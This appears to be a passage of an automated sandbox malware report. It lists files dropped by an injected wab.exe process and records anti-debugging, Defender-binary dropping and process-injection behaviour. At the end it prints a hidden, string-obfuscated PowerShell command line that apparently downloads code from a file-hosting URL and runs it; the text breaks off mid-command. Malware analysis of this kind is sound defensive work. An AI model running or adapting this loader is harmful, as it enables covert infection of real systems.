              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep count: 5858 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 3995 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW t.
              Source: wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2188971993.000001E2CCF37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ )
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07B449B0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_07B449B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7596.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR
              Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3F20000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2C9FA4CJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa 